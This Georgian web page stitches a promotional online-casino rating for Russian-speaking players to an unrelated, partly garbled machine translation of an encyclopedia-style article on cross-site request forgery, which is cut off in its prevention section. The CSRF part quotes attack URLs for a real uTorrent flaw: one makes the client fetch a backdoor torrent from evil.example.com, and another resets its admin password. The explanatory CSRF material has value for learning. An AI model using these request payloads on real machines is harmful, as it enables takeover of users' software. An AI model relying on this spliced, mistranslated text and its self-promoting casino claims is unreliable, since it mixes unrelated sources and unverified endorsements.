სანდო და პატიოსანი ონლაინ კაზინოების პოვნა მოითხოვს დიდ თავისუფალ დროს, განსაკუთრებით მაშინ, როდესაც საქმე დამწყებთათვისაა. აუცილებელია შეფასდეს სათამაშო კლუბის გამჭვირვალობა, ონლაინ რეპუტაცია, სხვა მომხმარებლების გამოხმაურება, გადახდების სიჩქარე და აქტივობის მრავალი სხვა ფაქტორი. ფეხბურთელების მსგავსი ბედის გადასარჩენად ჩვენ შევადგინეთკაზინოს რეიტინგი , რომლებიც საფუძვლიანად იქნა გამოცდილი და დაადასტურეს საკუთარი პატიოსნება და კარგი ანაზღაურება სათამაშო ავტომატებზე.

საუკეთესო კაზინოების ჩვენი რეიტინგი

თქვენ აღარ გჭირდებათ პირადი დროის დახარჯვა დაწესებულების სანდოობის შესამოწმებლად. გამოცდილმა ანალიტიკოსებმა, რომლებიც სპეციალიზირებულნი არიან აზარტულ თამაშებში და ყოველთვიურად ათეულობით საათს ატარებენ კაზინოებში, გააკეთეს საკუთარი ობიექტური შეფასება სათამაშო კლუბების მუშაობის შესახებ. მათ გააანალიზეს ასობით დაწესებულება, რათა საბოლოოდ შესთავაზონ მომხმარებლებს ინტერნეტში არსებული საუკეთესო პლატფორმები.

კლუბების საწყისი სია საკმაოდ დიდი იყო, მაგრამ ანალიზის პროცესში საეჭვო და არასანდო ინსტიტუტები დაეცა. მაგალითად, ყალბი ლიცენზიის არსებობა, სლოტებისთვის სერთიფიკატების არარსებობა, სერვერის ჩანაცვლება სათამაშო აპარატში და მრავალი სხვა, ექსპერტებისთვის გაფრთხილებაა. ერთი ფაქტორიც კი, რომელიც საშუალებას გაძლევთ ეჭვი შეიტანოთ კაზინოს პატიოსნებაში, არის რეიტინგიდან გამორიცხვის მიზეზი.

სათამაშო პლატფორმების ზედაპირული ანალიზის გარდა, მოწმდება ინფორმაცია დაწესებულებების შესახებ ინტერნეტში. ანალიზში გათვალისწინებულია რეპუტაცია ქსელში, მოქმედი და ყოფილი მოთამაშეების მიმოხილვები, კონფლიქტური სიტუაციების არსებობა, კაზინო სკანდალები და შემქმნელებისგან პრობლემების გადაჭრის გზები. განსაკუთრებული ყურადღება ეთმობა ახალგაზრდა კლუბებს 1-2 წლამდე გამოცდილებით.

როგორ ხდება კაზინოს რეიტინგი და ვინ მოხვდება იქ?

შესაქმნელად ლიცენზირებული კაზინოების რეიტინგიჩვენ ვიზიდავთ გამოცდილ მოთამაშეებს და ანალიტიკოსებს, რომლებსაც აქვთ 10 წელზე მეტი გამოცდილება ინდუსტრიაში. მათი ცოდნის წყალობით, ისინი ადვილად აშორებენ თაღლითურ კლუბებს და შემდეგ ახორციელებენ დარჩენილი დაწესებულებების საფუძვლიან ანალიზს. შედეგი არის სანდო კაზინოების მცირე ჩამონათვალი, სადაც შეგიძლიათ უსაფრთხოდ ითამაშოთ შედეგებისა და გადახდების პატიოსნების შიშის გარეშე.

• აზარტული თამაშების მარეგულირებელი ლიცენზიის და რეგისტრაციისთვის არჩეული იურისდიქციის ხელმისაწვდომობა;
• პლატფორმის უსაფრთხოება, რომელიც უზრუნველყოფს მონაცემთა და გადახდის ინფორმაციის კონფიდენციალურობას;
• ლიცენზირებული პროგრამული უზრუნველყოფის შერჩევა სანდო პროვაიდერებისგან, რომელთა მუშაობაში ჩარევა შეუძლებელია;
• რუსულენოვანი ვერსიის არსებობა რუსეთიდან და დსთ-ს ქვეყნებიდან მომხმარებელთა მეტი მოხერხებულობისთვის;
• მხარდაჭერის სერვისი, მათ შორის მისი მუშაობის გრაფიკი, რეაგირების სიჩქარე, პრობლემის გადაჭრის ხარისხი;
• თანხის გატანა დამატებითი შეფერხებებისა და დამოწმებების გარეშე, ასევე ფულის მიღების ვარიანტები და ტრანზაქციების დამუშავების სიჩქარე;
• ბონუს პროგრამები ახალი და რეგულარული მომხმარებლებისთვის, ტურნირების ხელმისაწვდომობა, ლატარიები, პერიოდული აქციები;
• გადახდის სისტემები, რომლებიც გავლენას ახდენენ მომხმარებელთა მოხერხებულობაზე ანგარიშის შევსებისა და მოგების გატანაზე.

ეს მხოლოდ მცირე ჩამონათვალია მიმდინარე მოთხოვნებისა, რომლებიც შეფასებულია ექსპერტების მიერ. თითოეული კრიტერიუმი იღებს მნიშვნელობის საკუთარ კოეფიციენტს, რომელიც მხედველობაში მიიღება საბოლოო შედეგის შეჯამებისას.

რა არის ლიცენზირებული კაზინო?

კაზინოს რეიტინგი , რაც მიუთითებს სათამაშო პლატფორმების მუშაობის პატიოსნებასა და გამჭვირვალობაზე, შეიძლება შედგებოდეს ექსკლუზიურად დაწესებულებებისგან, რომლებსაც აქვთ მოქმედი ლიცენზია. ლეგიტიმური კლუბები ვალდებულნი არიან გაიარონ მარეგულირებელი შემოწმება და დაიცვან ყველა მათი წესი, რათა დამტკიცდეს.

საიტზე ლიცენზიის არსებობის მხოლოდ ხსენება საკმარისი არ არის. ექსპერტებს ესმით, რომ თაღლითებს შეუძლიათ გამოიყენონ ლოგოები გულუბრყვილო მომხმარებლების მოსატყუებლად, ამიტომ ისინი თავად აანალიზებენ ინფორმაციას. ამისათვის გადადით მარეგულირებლის ოფიციალურ ვებსაიტზე და დაადასტურეთ ინფორმაცია დოკუმენტის ნომრის ან იურიდიული პირის სახელის გამოყენებით. თუ არ არის ლიცენზიის ინფორმაცია, მაშინ ის ყალბია.

ანალიტიკოსები ასევე იყენებენ ტექნიკურ ანალიზს ლიცენზირებული პროგრამული უზრუნველყოფის შესამოწმებლად. დეველოპერის ხელსაწყოების დახმარებით ისინი იღებენ წვდომას მონაცემთა გადაცემის სერვერის შესახებ ინფორმაციას. თუ კაზინო იყენებს პროგრამული უზრუნველყოფის პროვაიდერის ოფიციალურ პორტალს, მაშინ პროგრამა პატიოსანი და ლეგალურია. ეს ნიშნავს, რომ შეუძლებელია მის მუშაობაში ჩარევა და საბოლოო შედეგების გადახვევა.

როგორ განისაზღვრება კაზინოს პატიოსნება?

საკმაოდ რთულია სათამაშო კლუბის პატიოსნების დამოუკიდებლად შეფასება, რაც განპირობებულია არსებული რესურსებითა და ცოდნით. დაწესებულებების ჩართვამდეპატიოსანი კაზინოების რეიტინგიანალიტიკოსები ახორციელებენ მრავალი ფაქტორის საფუძვლიან შემოწმებას:

• რეგიონები, საიდანაც მიიღებენ მოთამაშეებს, რადგან აკრძალული იურისდიქციები ბევრს საუბრობენ;
• განაღდების ლიმიტები, რომლებიც ზღუდავს ერთჯერად ტრანზაქციას, ასევე ტრანზაქციების დღიურ, ყოველკვირეულ და ყოველთვიურ ოდენობას;
• KYC-ისა და AML-ის შესახებ ინფორმაციის ხელმისაწვდომობა, რაც მიუთითებს ფულის წარმოშობის პატიოსნებისა და კანონიერების შესახებ კანონმდებლობის მოთხოვნებთან შესაბამისობაზე;
• რეპუტაცია, რომელიც ადასტურებს კლუბის პატიოსნებასა და სანდოობას და გახმაურებული სკანდალების ან პრობლემების არარსებობას;
• სამუშაოს ხანგრძლივობა, რომელიც საშუალებას გაძლევთ სრულად შეაფასოთ ონლაინ რესურსის ისტორია, ყველა დადებითი და უარყოფითი მხარეების ჩათვლით;
• მარეგულირებლის არსებობა და მისი წესების დაცვა, რაც ზრდის სამართლიანობის შანსებს.

ლიცენზია და მარეგულირებელი საკმაოდ მნიშვნელოვანი კრიტერიუმია, მაგრამ ეს არ იძლევა პატიოსნების 100%-იან გარანტიას. ასეთი ტიტულის იმედი მხოლოდ კლუბებს შეუძლიათ, რომლებმაც მოთამაშეებს დიდი მოგების და ჯეკპოტების მიღების საშუალება მისცეს, გასცეს საჩუქრები ლატარიებსა და ტურნირებზე.

სათამაშო აპარატების ჯიშები

სლოტების, აპარატების და სხვა სახის სათამაშო გართობის რაოდენობა ბევრს ამბობს დაწესებულების შესახებ. ზოგიერთი კლუბი თანამშრომლობს მხოლოდ რამდენიმე პროგრამული უზრუნველყოფის პროვაიდერთან, მაგრამ მათგან იღებს პოპულარულ და ახალ სათამაშო შეთავაზებებს, ზოგი კი აფართოებს პარტნიორობის ხელშეკრულებების ქსელს და იწვევს ბრენდების დიდ რაოდენობას თანამშრომლობისთვის. რაც უფრო მეტი სათამაშო აპარატი იქნება წარმოდგენილი სათამაშო პლატფორმაზე, მით უფრო ადვილია კლიენტისთვის აირჩიოს სათამაშო, რომელიც მოსწონს.

მაგრამ ლიცენზირებული კაზინოების რეიტინგიითვალისწინებს არა მხოლოდ თამაშების მრავალფეროვნებას, არამედ მათ ხარისხსაც. სანდო სათამაშო დაწესებულებები იყენებენ ექსკლუზიურად ლიცენზირებულ პროგრამულ უზრუნველყოფას, რომელიც გამოცდილია პატიოსნებასა და უსაფრთხოებაზე. ასეთი მანქანები საშუალებას გაძლევთ იმედი გქონდეთ 98%-მდე ანაზღაურებაზე და არ შეგიძლიათ ჩაერიოთ მათ მუშაობაში და შეცვალოთ შედეგების გენერირების ალგორითმი.

გულწრფელად რომ ვთქვათ, ყველა საიტი მიზნად ისახავს მოგების მიღებას. მაშინაც კი, თუ ერთ-ერთმა მოთამაშემ ჯეკპოტი მოიგო, კაზინო გრძელვადიან პერსპექტივაში რჩება შავ მდგომარეობაში. მაგრამ მხოლოდ პატიოსანი კლუბები საშუალებას აძლევს მომხმარებლებს მიიღონ დიდი ჯეკპოტი და გაიტანონ ის რეალურ ანგარიშზე. ეს არის ის, რაც განასხვავებს ლიცენზირებულ ონლაინ კაზინოებს თაღლითური პროექტებისგან.

ბონუს პოლიტიკა

შექმენით კაზინოს რეიტინგი ბონუს პოლიტიკის გათვალისწინების გარეშე შეუძლებელია. ყველა სათამაშო კლუბი იყენებს აქციებსა და საჩუქრებს ახალი მომხმარებლების მოსაზიდად და არსებული მომხმარებლების შესანარჩუნებლად. მაგრამ ზოგიერთი ინსტიტუტი საკმაოდ ეშმაკურად მოქმედებს, ქმნის ფარულ პირობებს ფსონების ან დარიცხვისთვის, ადგენს არარეალურ ფსონების პირობებს x60-დან 100-მდე, რომელთა შესრულებაც თითქმის შეუძლებელია.

წახალისების სტანდარტული ნაკრები შედგება შემდეგი კატეგორიებისაგან:

1. დეპოზიტის ბონუსი არ არის ახალი მომხმარებლების მისასალმებლად - დაჯილდოვებულია ელექტრონული ფოსტის მისამართისა და ტელეფონის ნომრის დადასტურებისთვის. ჯილდოდ გამოიყენება უფასო ფული ან უფასო დატრიალებები სათამაშო ავტომატებზე სავალდებულო ფსონების პირობით.
2. სარეგისტრაციო საჩუქარი - უფასო დატრიალებები ან ანგარიშის შევსების თანხის მამრავლები 1-5 დეპოზიტზე პირადი პროფილის შექმნის მომენტიდან. ბონუსის ზუსტი ოდენობა და მაქსიმალური ლიმიტები დგინდება ინდივიდუალურად თითოეული კლუბის მიერ.
3. ლოიალობის პროგრამა - მომხმარებლის სტატუსის სხვადასხვა სისტემა, რომლებიც გავლენას ახდენენ ყოველკვირეული ქეშბექის ზომაზე, მომსახურების პირადი პირობების ხელმისაწვდომობაზე, ინდივიდუალურ საჩუქრებზე, შიდა ვალუტის ხელსაყრელ კურსზე ფულისთვის და მრავალი სხვა.
4. პრომო კოდები არის პერიოდული აქციები სათამაშო კლუბებიდან, რომლებიც ავრცელებენ სასაჩუქრე სერთიფიკატებს უფასო დატრიალებისთვის, დეპოზიტის გარეშე ბონუსებისთვის ან ანგარიშის მულტიპლიკატორებისთვის ყველასთვის.

რუსულენოვანი კაზინოები

კომპოზიცია საუკეთესო კაზინოების რეიტინგი 2020 წელსგათვალისწინებულია რუსული ენის არსებობა პლატფორმაზე. რუსულენოვანი ინტერფეისი საშუალებას აძლევს მომხმარებლებს რუსეთიდან, ბელორუსიდან, უკრაინიდან და დსთ-ს ქვეყნებიდან მარტივად გაუმკლავდნენ რეგისტრაციას, შესვლას, ანგარიშის შევსებას და პლატფორმის სხვა მახასიათებლებს. ის ასევე ადასტურებს, რომ ინსტიტუტი ორიენტირებულია რუსულენოვან მომხმარებლებზე, სთავაზობს მათ უნიკალურ ბონუსებს და მხარდაჭერას.

მხედველობაში მიიღება მხარდაჭერის სამსახურის მუშაობა. აზარტული თამაშების კლუბების უმეტესობა კლიენტებს დახმარებას უწევს ექსკლუზიურად ინგლისურ ენაზე, რაც ართულებს კომუნიკაციას. თქვენ უნდა გამოიყენოთ თარჯიმანი ან დაუკავშირდეთ მცოდნე ადამიანებს მოთხოვნის გასაკეთებლად და მხარდაჭერის პასუხის გასაგებად. ამრიგად, რეიტინგი მოიცავს მხოლოდ იმ ონლაინ კლუბებს, რომლებიც ურჩევენ კლიენტებს დამხმარე ჩეთებში და ტელეფონით რუსულ ენაზე.

კაზინოში რუსულენოვანი ინტერფეისი საშუალებას მოგცემთ ადვილად გაიგოთ პლატფორმის მომხმარებლის წესები, შეისწავლოთ ბონუსების შეთავაზებები და მათი დარიცხვის მახასიათებლები, ფსონები, მონაწილეობა მიიღოთ ტურნირებში და ლატარიებში მოქმედებების სისწორეში ეჭვის გარეშე.

კაზინო სწრაფი განაღდებით

განსაკუთრებული ყურადღება ექცევა ონლაინ კაზინოებში გადახდების სიჩქარეს. ზოგიერთი კლუბი გვთავაზობს თანხის განაღდებას საბანკო ბარათებზე და ელექტრონულ საფულეებზე რამდენიმე საათში, ხოლო VIP კლიენტებისთვის ისინი მოთხოვნებს მყისიერად ამუშავებენ. სხვები იყენებენ განაცხადების ხელით დამუშავებას სამუშაო დღეებში სპეციალური გრაფიკის მიხედვით, ამიტომ გადახდები შეიძლება გადაიდოს განაცხადის შეტანის მომენტიდან 1-3 სამუშაო დღის განმავლობაში. მომხმარებლების ხანგრძლივი ლოდინის გადასარჩენად, შექმნილიაკაზინოს სწრაფი გატანის რეიტინგი.

იგი შედგება ექსკლუზიურად იმ დაწესებულებებისგან, რომლებიც ოპერატიულად განიხილავენ ყველა განაცხადს და არ უქმნიან დაბრკოლებებს ფულის მისაღებად. მხედველობაში მიიღება არა მხოლოდ გადარიცხვების სიჩქარე, არამედ პრობლემების არარსებობა დიდი გადახდების ან ფულადი გზავნილების მოთხოვნისას ჯეკპოტის მოგების შემდეგ, დიდი ჯეკპოტი. მხოლოდ პატიოსან დაწესებულებებს შეუძლიათ უზრუნველყონ გადახდების სამართლიანობა და გადახდებთან დაკავშირებული პრობლემების არარსებობა.

ის ასევე აანალიზებს ხელმისაწვდომ საგადახდო სისტემებს დეპოზიტებისთვის და ფულის მოთხოვნაზე. სტანდარტული საიტები მხარს უჭერენ მინიმალურ გზებს, მაგრამ პროგრესული კლუბები მუდმივად აანალიზებენ ტენდენციებს ახალი ტექნიკური გადაწყვეტილებების ინტეგრირებისთვის.

ძირითადი გადახდის სისტემები ონლაინ კაზინოებში:

• საბანკო ბარათები MIR, MasterCard, Visa;
• ელექტრონული საფულეები QIWI, Yandex, Webmoney, Neteller, Skrill და სხვა;
• მობილური გადახდები Beeline, MegaFon, MTS, TELE2;
• რუსული ინტერნეტ ბანკინგი;
• პოპულარული კრიპტოვალუტები, მათ შორის Bitcoin, Ethereum, Litecoin.

მომხმარებლის ტექნიკური დახმარების სერვისი

მნიშვნელოვანი ფაქტორი, რომელიც გათვალისწინებული იყო შექმნისასპატიოსანი კაზინოების რეიტინგი- მომხმარებელთა დახმარების სერვისის ხელმისაწვდომობა და მისი მუშაობის ხარისხი. სანდო დაწესებულებები ზრუნავენ საკუთარ კლიენტთა ბაზაზე, ამიტომ აწყობენ სპეციალურ სატელეფონო ხაზებს, ასევე ონლაინ ჩეთებს მომხმარებლის კითხვებზე სწრაფი რეაგირებისა და მათი პრობლემების გადასაჭრელად.

მხარდაჭერის გასაანალიზებლად ანალიტიკოსებმა გამოიყენეს სატელეფონო ხაზები, პირდაპირი ჩეთები და ელ.ფოსტის კონტაქტები. დღის სხვადასხვა დროს საიტის თანამშრომლები იღებდნენ სხვადასხვა კითხვებსა თუ თხოვნებს ტექნიკური პრობლემების მოსაგვარებლად. ამის შემდეგ განხორციელდა მათი მუშაობის ხარისხის შეფასება, რომელიც მოიცავდა შემდეგ ფაქტორებს:

• პასუხების გაცემის სიჩქარე;
• წყვეტს თუ არა კონსულტანტი პრობლემას და რამდენი დრო დასჭირდა;
• პასუხების წიგნიერება და რუსულენოვანი თანამშრომლების ყოფნა მხარდასაჭერად.

თუ კაზინოს არ ჰყავს რუსულენოვანი ოპერატორები, გირჩევთ გამოიყენოთ Google-ის ონლაინ თარჯიმანი კონსულტანტების კითხვებისა და პასუხების თარგმნისთვის.

დასკვნები

ონლაინ კლუბში დარეგისტრირებამდე თქვენ უნდა გაანალიზოთ მისი მუშაობის სანდოობა, გამჭვირვალობა, ასევე შეამოწმოთ რეპუტაცია და მიმოხილვები ქსელში. ამის ნაცვლად, ჩვენ გირჩევთ გამოიყენოთპატიოსანი კაზინოების რეიტინგიგამოცდილი აზარტული მოთამაშეების მიერ შედგენილი. საკუთარი გამოცდილებით, მათ უარყვეს ათობით საეჭვო სათამაშო კლუბი, რითაც სიაში 2020 წლის საუკეთესო დაწესებულებები დატოვეს.

ჯვარედინი გაყალბების მოთხოვნა, ასევე ცნობილია, როგორც ერთი დაწკაპუნებით შეტევაან საცხენოსნო სესიადა შემოკლებით CSRF(ზოგჯერ გამოხატულია მოქცევის ჭაბურღილი) ან XSRF, არის მავნე პროგრამის ტიპი, რომელიც გამოიყენება ვებსაიტიდან, სადაც არაავტორიზებული ბრძანებები იგზავნება იმ მომხმარებლისგან, რომელსაც ენდობა ვებ აპლიკაცია. არსებობს მრავალი გზა, რომლითაც მავნე ვებსაიტს შეუძლია ასეთი ბრძანებების გაგზავნა; სპეციალურად შემუშავებული სურათის ტეგები, დამალული ფორმები და JavaScript XMLHttpRequests, მაგალითად, ყველაფერი შეიძლება იმუშაოს მომხმარებლის ურთიერთქმედების ან თუნდაც ცოდნის გარეშე. ჯვარედინი სკრიპტირების (XSS)გან განსხვავებით, რომელიც იყენებს მომხმარებლის ნდობას კონკრეტული საიტის მიმართ, CSRF იყენებს ნდობას, რომელიც საიტს აქვს მომხმარებლის ბრაუზერის მიმართ.

ამბავი

CSRF დაუცველობა ცნობილია და გამოიყენება ზოგიერთ შემთხვევაში 2001 წლიდან. რადგან ის შესრულებულია მომხმარებლის IP მისამართიდან, ზოგიერთი ვებსაიტის ჟურნალს შეიძლება არ ჰქონდეს CSRF მტკიცებულება. ექსპლოიტების შესახებ არასაკმარისი ინფორმაციაა, ყოველ შემთხვევაში საჯაროდ, და 2007 წლის მდგომარეობით იყო რამდენიმე კარგად დოკუმენტირებული მაგალითი:

• Netflix-ის ვებსაიტს 2006 წელს ჰქონდა მრავალი CSRF დაუცველობა, რაც თავდამსხმელს შეეძლო შეესრულებინა ისეთი ქმედებები, როგორიცაა DVD-ის დამატება მსხვერპლის გაქირავების რიგში, ანგარიშზე მიტანის მისამართის შეცვლა ან მსხვერპლის შესვლის სერთიფიკატების შეცვლა ანგარიშის სრულად დარღვევისთვის.
• ონლაინ საბანკო ვებ-აპლიკაცია ING Direct დაუცველი იყო CSRF შეტევების მიმართ, რამაც დაუშვა უკანონო ფულის გადარიცხვები.
• პოპულარული ვიდეო ვებგვერდი YouTube ასევე დაუცველი იყო CSRF-ის მიმართ 2008 წელს და ეს საშუალებას აძლევდა ნებისმიერ თავდამსხმელს შეესრულებინა თითქმის ყველა მომხმარებლის მოქმედება.
• McAfee ასევე დაუცველია CSRF-ის მიმართ, რამაც თავდამსხმელებს საშუალება მისცა შეცვალონ თავიანთი კომპანიის სისტემა.

2018 წელს განხორციელდა ახალი შეტევები ვებ მოწყობილობებზე, მათ შორის მარშრუტიზატორების DNS პარამეტრების შეცვლის მცდელობები. როუტერის ზოგიერთმა მწარმოებელმა ნაჩქარევად გამოუშვა firmware განახლებები უსაფრთხოების გასაუმჯობესებლად და ურჩია მომხმარებლებს შეცვალონ როუტერის პარამეტრები რისკის შესამცირებლად. დეტალები არ გავრცელებულა, "უსაფრთხოების აშკარა შეშფოთების" მოტივით.

მაგალითი და მახასიათებლები

თავდამსხმელებს, რომლებსაც შეუძლიათ იპოვონ რეპროდუცირებადი ბმული, რომელიც ახორციელებს გარკვეულ მოქმედებას სადესანტო გვერდზე, სანამ მსხვერპლი შესულია, შეუძლიათ განათავსონ ასეთი ბმული იმ გვერდზე, რომელსაც აკონტროლებენ და მოატყუონ მსხვერპლი, რათა გახსნას იგი. ოპერატორის თავდასხმის ბმული შეიძლება განთავსდეს იმ ადგილას, რომელსაც მსხვერპლი სავარაუდოდ ეწვევა სამიზნე საიტზე შესვლით (როგორიცაა ფორუმის დისკუსია), ან გაიგზავნოს HTML ელფოსტის ტექსტში ან დანართში. რეალურმა CSRF დაუცველობამ utorrent-ში (CVE-2008-6586) გამოიყენა ის ფაქტი, რომ მისი ვებ კონსოლი ხელმისაწვდომია ლოკალურ ჰოსტზე: 8080 საშუალებას აძლევდა კრიტიკული მოქმედებების შესრულებას მარტივი GET მოთხოვნით:

აიძულეთ .torrent ფაილის გადმოწერა http://localhost:8080/gui/action=add url&s=http://evil.example.com/backdoor.torrent შეცვალეთ ადმინისტრატორის პაროლი utorrent http://localhost:8080/gui/action =setsetting&s =webui.password&v=eviladmin

თავდასხმები დაიწყო ფორუმებზე მავნე, ავტომატიზირებული HTML გამოსახულების ელემენტების გამოქვეყნებით და ელ.ფოსტის სპამით, რათა ბრაუზერები, რომლებიც სტუმრობენ ამ გვერდებს, გახსნიდნენ მათ ავტომატურად, მომხმარებლის მხრიდან დიდი მოქმედების გარეშე. ადამიანები, რომლებიც აწარმოებენ utorrent-ის დაუცველ ვერსიას ამ გვერდების გახსნის პარალელურად, ექვემდებარებოდნენ თავდასხმას.

CSRF შეტევები სურათების ტეგების გამოყენებით ხშირად ხდება ინტერნეტ ფორუმებიდან, სადაც მომხმარებლებს შეუძლიათ გამოაქვეყნონ სურათები, მაგრამ არა JavaScript, მაგალითად, BBCode-ის გამოყენებით:

http://localhost:8080/gui/?action=add-url&s=http://evil.example.com/backdoor.torrent

ადგილობრივი utorrent აპლიკაციაზე localhost-ზე: 8080 შეტევის ბმულზე წვდომისას, ბრაუზერი ასევე ყოველთვის ავტომატურად აგზავნის არსებულ ქუქი-ფაილებს ამ დომენისთვის. ვებ ბრაუზერების ეს საერთო თვისება საშუალებას აძლევს CSRF შეტევებს გამოიყენონ მათი მიზანმიმართული დაუცველობა და განახორციელონ მტრული ქმედებები, სანამ მომხმარებელი შესულია სამიზნე ვებსაიტში (ამ მაგალითში, ადგილობრივი utorrent ვებ ინტერფეისი) თავდასხმის დროს.

ჯვარედინი მოთხოვნის გაყალბება არის დამაბნეველი პროქსი შეტევა ვებ ბრაუზერის წინააღმდეგ.

CSRF ჩვეულებრივ აქვს შემდეგი მახასიათებლები:

• ის მოიცავს საიტებს, რომლებიც ეყრდნობა მომხმარებლის იდენტურობას.
• ის იყენებს საიტის ნდობას ამ იდენტობის მიმართ.
• ის ატყუებს მომხმარებლის ბრაუზერს HTTP მოთხოვნების გაგზავნაში სამიზნე საიტზე.
• იგი მოიცავს HTTP მოთხოვნებს, რომლებსაც აქვთ გვერდითი მოვლენები.

HTTP ზმნები და CSRF

• HTTP GET-ში CSRF-ის ექსპლუატაცია ტრივიალურია, ზემოთ აღწერილი მეთოდების გამოყენებით, როგორიცაა მარტივი ჰიპერბმული, რომელიც შეიცავს მანიპულირებულ პარამეტრებს და ავტომატურად იტვირთება IMG ტეგის გამოყენებით. თუმცა, HTTP სპეციფიკაციის მიხედვით, GET უნდა იყოს გამოყენებული, როგორც უსაფრთხო მეთოდი, ანუ მნიშვნელოვნად არ შეცვალოს მომხმარებლის მდგომარეობა აპლიკაციაში. აპლიკაციები, რომლებიც იყენებენ GET-ს ასეთი ოპერაციებისთვის, უნდა გადაერთონ HTTP POST-ზე ან გამოიყენონ CSRF დაცვა.
• HTTP POST-ს აქვს სხვადასხვა CSRF დაუცველობა, რაც დამოკიდებულია გამოყენების დეტალურ შემთხვევებზე:
  • მისი უმარტივესი POST ფორმით, მონაცემებით დაშიფრული, როგორც შეკითხვის სტრიქონი (field1=value1&field2=value2) CSRF შეტევები ადვილად განხორციელდება მარტივი HTML ფორმით და უნდა იქნას გამოყენებული ანტი-CSRF ზომები.
  • თუ მონაცემები იგზავნება სხვა ფორმატში (JSON, XML), სტანდარტული მეთოდია POST მოთხოვნის გაცემა XMLHttpRequest-ის გამოყენებით CSRF შეტევებით, რომლებიც აღკვეთილია SOP და ; არსებობს მარტივი HTML ფორმიდან თვითნებური შინაარსის წარდგენის მეთოდი ENCTYPE ატრიბუტის გამოყენებით; ასეთი ყალბი მოთხოვნა შეიძლება განვასხვავოთ ლეგიტიმურიდან ტექსტის/უბრალო შინაარსის ტიპის მიხედვით, მაგრამ თუ ეს არ არის შესრულებული სერვერზე, CSRF შეიძლება შესრულდეს
• სხვა HTTP მეთოდები (PUT, DELETE და ა.შ.) შეიძლება გაიცეს მხოლოდ XMLHttpRequest გამოყენებით SOP და CSRF პრევენციით; თუმცა, ეს ზომები არ იქნება აქტიური საიტებზე, რომლებიც აშკარად გამორთავს მათ Access-Control-Allow-Origin: * სათაურის გამოყენებით.

CSRF-ის სხვა მიდგომები

გარდა ამისა, მიუხედავად იმისა, რომ ჩვეულებრივ აღწერილია, როგორც თავდასხმის სტატიკური ტიპი, CSRF ასევე შეიძლება დინამიურად აშენდეს, როგორც დატვირთვის ნაწილი ჯვარედინი თავდასხმის სცენარებისთვის, როგორც ეს აჩვენებს Samy ჭიას, ან აშენდეს ფრენის დროს სესიის ინფორმაციისგან, რომელიც გაჟონა გასასვლელში. და გაგზავნილია სამიზნეზე, როგორც მავნე URL. CSRF ტოკენები ასევე შეიძლება გამოაგზავნოს თავდამსხმელმა კლიენტმა სესიის ფიქსაციის ან სხვა დაუცველობის გამო, ან გამოიცნოს უხეში ძალის შეტევა, გადათარგმნილი მავნე გვერდზე, რომელიც წარმოქმნის ათასობით წარუმატებელ მოთხოვნას. "Dynamic CSRF" თავდასხმის კლასი, ან თითო კლიენტის დატვირთვის გამოყენება კონკრეტული გაყალბების სესიისთვის, აღწერილი იქნა 2009 წელს ნათან ჰამიელის და შონ მოიერის მიერ BlackHat ბრიფინგზე, თუმცა ტაქსონომიას ჯერ კიდევ არ აქვს უფრო ფართო გამოყენება.

დინამიური CSRF შეტევების შედგენის ახალი ვექტორი წარმოადგინა ორენ ოფერმა ადგილობრივ OWASP თავთა შეხვედრაზე 2012 წლის იანვარში - "AJAX Hammer - Dynamic CSRF".

ეფექტები

გამოქვეყნებულია სიმძიმის ინდიკატორები CSRF დაუცველობაზე, რაც იწვევს კოდის დისტანციურ შესრულებას root პრივილეგიებით, ასევე დაუცველობას, რომელმაც შეიძლება ზიანი მიაყენოს root სერტიფიკატს, რაც მთლიანად ძირს უთხრის საჯარო გასაღების ინფრასტრუქტურას.

შეზღუდვები

რამდენიმე რამ უნდა მოხდეს იმისათვის, რომ საიტის გაყალბების მოთხოვნა წარმატებული იყოს:

1. თავდამსხმელმა უნდა მიმართოს ან საიტს, რომელიც არ ამოწმებს რეფერენტის სათაურს, ან მსხვერპლი ბრაუზერის ან დანამატის გამოყენებით, რომელიც რეფერერის გაყალბების საშუალებას იძლევა.
2. თავდამსხმელმა უნდა მოძებნოს ფორმის გაგზავნა სამიზნე საიტზე, ან URL, რომელსაც აქვს გვერდითი ეფექტები, რაც რაღაცას აკეთებს (როგორიცაა ფულის გადარიცხვა, ან მსხვერპლის ელფოსტის მისამართის ან პაროლის შეცვლა).
3. თავდამსხმელმა უნდა განსაზღვროს სწორი მნიშვნელობები ყველა ფორმისთვის ან URL შეყვანისთვის; თუ რომელიმე მათგანი უნდა იყოს საიდუმლო ავთენტიფიკაციის მნიშვნელობები ან იდენტიფიკატორები, თავდამსხმელი ვერ შეძლებს გამოიცნოს ის, რაც სავარაუდოდ არ შეუძლია თავდამსხმელს (თუ თავდამსხმელს ძალიან გაუმართლა მათ გამოცნობაში).
4. თავდამსხმელმა უნდა მოატყუოს მსხვერპლი ვებ გვერდზე მავნე კოდით, სანამ მსხვერპლი შედის სამიზნე საიტზე.

თავდასხმა ბრმაა: თავდამსხმელი ვერ ხედავს, რას უგზავნის სამიზნე საიტი მსხვერპლს ყალბი მოთხოვნების საპასუხოდ, თუ ისინი არ გამოიყენებენ სკრიპტირებას ან სხვა შეცდომებს სამიზნე საიტზე. ასევე, თავდამსხმელს შეუძლია მიზანმიმართული იყოს მხოლოდ ნებისმიერი ბმული ან წარადგინოს ნებისმიერი ფორმა, რომელიც მოდის თავდაპირველი ყალბი მოთხოვნის შემდეგ, თუ ეს შემდგომი ბმულები ან ფორმები ისეთივე პროგნოზირებადია. (რამდენიმე სამიზნის სიმულაცია შესაძლებელია გვერდზე რამდენიმე სურათის ჩართვის ან JavaScript-ის გამოყენებით დაწკაპუნებებს შორის შეფერხების დასანერგად.)

ამ შეზღუდვების გათვალისწინებით, თავდამსხმელს შეიძლება გაუჭირდეს მსხვერპლის ანონიმების ან პრეზენტაციის დაუცველი ფორმის პოვნა. მეორეს მხრივ, თავდასხმის მცდელობები ადვილად დამონტაჟებული და შეუმჩნეველია მსხვერპლისთვის, ხოლო აპლიკაციის შემქმნელები ნაკლებად იცნობენ და მზად არიან CS შეტევებისთვის, ვიდრე, მაგალითად, პაროლის გატეხვის ლექსიკონის შეტევებისთვის.

პრევენცია

CSRF პრევენციის მეთოდების უმეტესობა მუშაობს მოთხოვნებში ავტორიზაციის დამატებითი მონაცემების შეყვანით, რაც საშუალებას აძლევს ვებ აპლიკაციას აღმოაჩინოს მოთხოვნები არაავტორიზებული ადგილებიდან.

სინქრონიზატორის მოდელის მარკერი

• შესვლისას, ვებ აპლიკაცია ადგენს ქუქი-ფაილს, რომელიც შეიცავს შემთხვევით ჟეტონს, რომელიც იგივე რჩება მომხმარებლის სესიის განმავლობაში.

